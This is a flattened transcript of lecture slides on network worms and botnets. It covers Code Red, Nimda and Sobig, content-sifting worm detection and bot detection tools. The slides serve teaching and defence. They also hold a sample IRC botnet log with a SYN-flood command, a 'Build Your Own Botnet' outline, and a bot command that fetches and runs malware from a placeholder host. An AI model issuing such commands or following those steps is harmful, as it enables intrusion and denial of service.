c - Mehran UET Scholars
Download
Report
Transcript c - Mehran UET Scholars
Network Worms and Bots
Outline
Worms
Worm examples and propagation methods
Detection methods
Traffic patterns: EarlyBird
Vulnerabilities: Generic Exploit Blocking
Disabling worms
Generate signatures for network or host-based filters
Bots
Structure and use of bots
Recognizing bot propagation
Recognizing bot operation
Network-based methods
Host-based methods
2
Worm
A worm is self-replicating software designed to
spread through the network
Typically, exploit security flaws in widely used services
Can cause enormous damage
Launch DDOS attacks, install bot networks
Access sensitive information
Cause confusion by corrupting the sensitive information
Worm vs Virus vs Trojan horse
3
A virus is code embedded in a file or program
Viruses and Trojan horses rely on human intervention
Worms are self-contained and may spread autonomously
Cost of worm attacks
Morris worm, 1988
Infected approximately 6,000 machines
10% of computers connected to the Internet
cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001
Direct descendant of Morris’ worm
Infected more than 500,000 servers
Programmed to go into infinite sleep mode July 28
Caused ~ $2.6 Billion in damages,
Love Bug worm: $8.75 billion
4
Statistics: Computer Economics Inc., Carlsbad, California
Internet Worm (First major attack)
Released November 1988
Program spread through Digital, Sun workstations
Exploited Unix security vulnerabilities
VAX computers and SUN-3 workstations running versions
4.2 and 4.3 Berkeley UNIX code
Consequences
No immediate damage from program itself
Replication and threat of damage
Load on network, systems used in attack
Many systems shut down to prevent further attack
5
Some historical worms of note
6
Worm
Date
Distinction
Morris
11/88 Used multiple vulnerabilities, propagate to “nearby” sys
ADM
5/98
Random scanning of IP address space
Ramen
1/01
Exploited three vulnerabilities
Lion
3/01
Stealthy, rootkit worm
Cheese
6/01
Vigilante worm that secured vulnerable systems
Code Red
7/01
First sig Windows worm; Completely memory resident
Walk
8/01
Recompiled source code locally
Nimda
9/01
Windows worm: client-to-server, c-to-c, s-to-s, …
Scalper
6/02
11 days after announcement of vulnerability; peer-topeer network of compromised systems
Slammer
1/03
Used a single UDP packet for explosive growth
Kienzle and Elder
Increasing propagation speed
Code Red, July 2001
Affects Microsoft Index Server 2.0,
Windows 2000 Indexing service on Windows NT 4.0.
Windows 2000 that run IIS 4.0 and 5.0 Web servers
Exploits known buffer overflow in Idq.dll
Vulnerable population (360,000 servers) infected in 14 hours
SQL Slammer, January 2003
Affects in Microsoft SQL 2000
Exploits known buffer overflow vulnerability
Server Resolution service vulnerability reported June 2002
Patched released in July 2002 Bulletin MS02-39
7
Vulnerable population infected in less than 10 minutes
Code Red
Initial version released July 13, 2001
Sends its code as an HTTP request
HTTP request exploits buffer overflow
Malicious code is not stored in a file
Placed in memory and then run
When executed,
Worm checks for the file C:\Notworm
If file exists, the worm thread goes into infinite sleep state
Creates new threads
If the date is before the 20th of the month, the next 99
threads attempt to exploit more computers by targeting
random IP addresses
8
Code Red of July 13 and July 19
Initial release of July 13
1st through 20th month: Spread
via random scan of 32-bit IP addr space
20th through end of each month: attack.
Flooding attack against 198.137.240.91 (www.whitehouse.gov)
Failure to seed random number generator linear growth
Revision released July 19, 2001.
9
White House responds to threat of flooding attack by
changing the address of www.whitehouse.gov
Causes Code Red to die for date ≥ 20th of the month.
But: this time random number generator correctly seeded
Slides: Vern Paxson
Code Red 2
Released August 4, 2001.
Comment in code: “Code Red 2.”
But in fact completely different code base.
Payload: a root backdoor, resilient to reboots.
Bug: crashes NT, only works on Windows 2000.
Localized scanning: prefers nearby addresses.
Kills Code Red 1.
Safety valve: programmed to die Oct 1, 2001.
10
Slides: Vern Paxson
Striving for Greater Virulence: Nimda
Released September 18, 2001.
Multi-mode spreading:
attack IIS servers via infected clients
email itself to address book as a virus
copy itself across open network shares
modifying Web pages on infected servers w/ client
exploit
scanning for Code Red II backdoors (!)
worms form an ecosystem!
Leaped across firewalls.
11
Slides: Vern Paxson
Code Red 2 kills
off Code Red 1
CR 1
returns
thanks
to bad
clocks
12
Nimda enters the
ecosystem
Code Red 2 settles
into weekly pattern
Code Red 2 dies off
as programmed
Slides: Vern Paxson
How do worms propagate?
Scanning worms
Worm chooses “random” address
Coordinated scanning
Different worm instances scan different addresses
Flash worms
Assemble tree of vulnerable hosts in advance, propagate along tree
Not observed in the wild, yet
Potential for 106 hosts in < 2 sec ! [Staniford]
Meta-server worm
Ask server for hosts to infect (e.g., Google for “powered by phpbb”)
Topological worm:
Use information from infected hosts (web server logs, email address
books, config files, SSH “known hosts”)
Contagion worm
13
Propagate parasitically along with normally initiated communication
Worm Detection and Defense
Detect via honeyfarms: collections of “honeypots”
Any outbound connection from honeyfarm = worm.
(at least, that’s the theory)
Distill signature from inbound/outbound traffic.
If honeypot covers N addresses, expect detection when
worm has infected 1/N of population.
Thwart via scan suppressors: network elements that
block traffic from hosts that make failed connection
attempts to too many other hosts
14
5 minutes to several weeks to write a signature
Several hours or more for testing
Signature inference
Monitor network and look for strings common
to traffic with worm-like behavior
15
Signatures can then be used for content filtering
Slide: S Savage
Content sifting
Assume there exists some (relatively) unique
invariant bitstring W across all instances of a
particular worm (true today, not tomorrow...)
Two consequences
Content Prevalence: W will be more common in traffic
than other bitstrings of the same length
Address Dispersion: the set of packets containing W will
address a disproportionate number of distinct sources and
destinations
Content sifting: find W’s with high content prevalence
and high address dispersion and drop that traffic
16
Slide: S Savage
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
Prevalence Table
17
(Stefan
Savage, UCSD *)
D
Address Dispersion Table
Sources
Destinations
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
1
18
(Stefan
Savage, UCSD *)
Address Dispersion Table
Sources
Destinations
1 (A)
1 (B)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
19
(Stefan
Savage, UCSD *)
1
1
Address Dispersion Table
Sources
Destinations
1 (A)
1 (C)
1 (B)
1 (A)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
20
(Stefan
Savage, UCSD *)
2
1
Address Dispersion Table
Sources
Destinations
2 (A,B)
1 (C)
2 (B,D)
1 (A)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
21
(Stefan
Savage, UCSD *)
3
1
Address Dispersion Table
Sources
Destinations
3 (A,B,D)
3 (B,D,E)
1 (C)
1 (A)
Challenges
Computation
To support a 1Gbps line rate we have 12us to process each
packet, at 10Gbps 1.2us, at 40Gbps…
Dominated by memory references; state expensive
Content sifting requires looking at every byte in a packet
State
On a fully-loaded 1Gbps link a naïve implementation can
easily consume 100MB/sec for table
Computation/memory duality: on high-speed (ASIC)
implementation, latency requirements may limit state to
on-chip SRAM
22
(Stefan
Savage, UCSD *)
Worm summary
Worm attacks
Many ways for worms to propagate
Propagation time is increasing
Polymorphic worms, other barriers to detection
Detect
Traffic patterns: EarlyBird
Watch attack: TaintCheck and Sting
Look at vulnerabilities: Generic Exploit Blocking
Disable
23
Generate worm signatures and use in network or
host-based filters
Botnet
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
24
Top concern of banks, online merchants
Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
capability
ago
DSNX
create port redirect
√
other proxy
√
download file from web
√
DNS resolution
√
UDP/ping floods
√
other DDoS floods
√
scan/spread
√
spam
√
visit URL
√
evil
G-SyS
sd
Spy
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
Capabilities are exercised via remote commands.
25
√
Building a Bot Network
compromise attempt
Attacker
compromise attempt
compromise attempt
compromise attempt
26
Win XP
FreeBSD
Mac OS X
Win XP
Building a Bot Network
compromise attempt
install bot software
Attacker
compromise attempt
compromise attempt
compromise attempt
install bot software
27
Win XP
compromised
FreeBSD
Mac OS X
Win XP
compromised
Step 2
Win XP
Win XP
Win XP
. . .
. . .
. . .
/connect
jade.va.us.dal.net
/connect
jade.va.us.dal.net
/connect
jade.va.us.dal.net
/join #hacker
/join #hacker
/join #hacker
. . .
. . .
. . .
jade.va.dal.net
28
Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected])
has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected])
has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected])
has joined (#owned) Users : 1650
29
•
•
•
•
•
30
Spam service
Rent-a-bot
Cash-out
Pump and dump
Botnet rental
Underground commerce
Market in access to bots
Botherd: Collects and manages bots
Access to proxies (“peas”) sold to spammers, often with
commercial-looking web interface
Sample rates
Non-exclusive access to botnet: 10¢ per machine
Exclusive access: 25¢.
Payment via compromised account (eg PayPal) or cash to
dropbox
Identity Theft
Keystroke logging
Complete identities available for $25 - $200+
Rates depend on financial situation of compromised person
Include all info from PC files, plus all websites of interest with
passwords/account info used by PC owner
At $200+, usually includes full credit report
31
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
Sobig.a In Action
Arrives as an email attachment
Written in C++
Encrypted with Telock to slow analysis
User opens attachment, launching trojan
Downloads file from a free Geocities account
Contains list of URLs pointing to second stage
Fetches second-stage trojan
32
Arbitrary executable file – could be anything
For Sobig.a, second-stage trojan is Lala
Stage 2 – Lala
Communication
Lala notifies a cgi script on a compromised host
Different versions of Lala have different sites and
cgi scripts, perhaps indicating tracking by author
Installation
Lala installs a keylogger and password-protected
Lithium remote access trojan.
Lala downloads Stage 3 trojan
Wingate proxy (commercial software)
Cleanup
33
Lala removes the Sobig.a trojan
Stage 3 – Wingate
Wingate is a general-purpose port proxy server
555/TCP – RTSP
Service
1180/TCP – SOCKS
1182/TCP – WWW Proxy
1184/TCP – POP3 Proxy
608/TCP – Remote Control
1181/TCP – Telnet Proxy
1183/TCP – FTP Proxy
1185/TCP – SMTP Server
Final state of compromised machine
Complete remote control by Lithium client with password
“adm123”
Complete logging of user’s keystrokes
Usable for spam relay, http redirects
Wingate Gatekeeper client can connect to 608/TCP,
can log/change everything
34
Build Your Own Botnet
Pick a vector mechanism
IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
Scan & Sploit: MSBlast
Trojan:
SoBig/BugBear/ActiveX Exploits
Choose a Payload
Backdoors
Do it
Agobot, SubSeven, DeepThroat
Most include mechanisms for DDoS, Self-spreading, download/exec
arbitrary code, password stealers.
Compromise an IRC server, or use your own zombied machines
Configure Payload to connect to selected server
Load encryption keys and codes
Release through appropriate compromised systems
Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
35
Bot detection methods
Signature-based (most AV products)
Rule-based
Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
Block certain ports (25, 6667, ...)
Hybrid: content-based filtering
Match network packet contents to known command strings (keywords)
E.g. Gaobot ddos cmds: .ddos.httpflood
Network traffic monitoring
Wenke Lee, Phil Porras: Bot Hunter, …
Correlate various NIDS alarms to identify “bot infection sequence”
GA Tech: Recognize traffic patterns associated with ddns-based rallying
Stuart Staniford, FireEye
Detect port scanning to identify suspicious traffic
Emulate host with taint tracking to identify exploit
36
Introduction
Approaches to Privacy-Preserving Correlation
A Cyber-TA Distributed Correlation Example – botHunter
What is botHunter?
A Real Case Study
Behavior-based Correlation
Architectural Overview
BotHunter:
passive
What
is botHunter?
botHunter Sensors
Correlation Framework
Example botHunter Output
Cyber-TA Integration
bot detection
Snort-based sensor suite for malware event detection
inbound scan detection
remote to local exploit detection
anomaly detection system for exploits over key TCP
protocols
Botnet specific egg download banners,
Victim-to-C&C-based communications exchanges
particularly for IRC bot protocols
Event correlator
37
combines information from sensors to recognize bots that
infect and coordinate with your internal network assets
Submits “bot-detection profiles” to the Cyber-TA repository
infrastructure
Botnets network traffic patterns
Unique characteristic: “rallying”
Bots spread like worms and trojans
Payloads may be common backdoors
Centralized control of botnet is characteristic feature
Georgia Tech idea: DNS
Bots installed at network edge
IP addresses may vary, use Dynamic DNS
Bots talk to controller, make DDNS lookup
Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke
Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
38
BotSwat
Host-based bot detection
Based on idea of remote control commands
39
What does remote control look like?
http.execute <URL> <local_path>
Invoke system calls:
connect, network send and recv, create file, write file, …
On arguments received over the network:
IP to connect to, object to request, file name, …
Botswat premise
40
We can distinguish the behavior of bots from that of
innocuous processes via detecting “remote control”
We can approximate “remote control” as “using data
received over the network in a system call argument”
http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
agobot
1
3
4
connect(…,www.badguy.com,…) 5
send( …,“…GET /malware.exe…”,…) 7
fcreate(…,“C:\WIN\malware.exe”,…) 8
2
Windows XP
41
NIC
6